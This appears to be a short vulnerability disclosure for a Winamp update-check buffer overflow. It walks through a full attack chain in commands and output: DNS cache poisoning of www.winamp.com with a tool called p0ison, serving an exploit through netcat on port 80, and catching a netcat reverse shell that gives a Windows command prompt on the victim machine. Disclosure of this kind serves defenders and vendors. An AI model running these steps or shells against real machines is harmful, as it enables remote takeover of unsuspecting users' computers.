Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and will then notify the user of
a possible upgrade via messagebox..
Unfortunately, if it were to receive a huge response, the thread
parsing the data is thrown into an infinite loop and eventually the
exception dispatcher is called.. and then like most of the time under
windows, a big, bad, overflow occurs.. i am attaching the real example
Sample attack
=============
Nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2
1) attacker poisons nameserver cache
192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
2) victim is now resolving www.winamp.com to attacker machine
192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1
Name: www.winamp.com
Address: 192.168.1.2
3) attacker fires up exploit as web daemon
192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
4) attacker waits for connect-back by exploit
192.168.1.2:
x@x:~$ nc -l -p 5555
5) foolish winamp user opens winamp!
192.168.0.2:
opens winamp, prepares for The Weather Girls - It\'s
Raining Men.mp3
6) BOOJAH!@
192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
/// control over machine taken
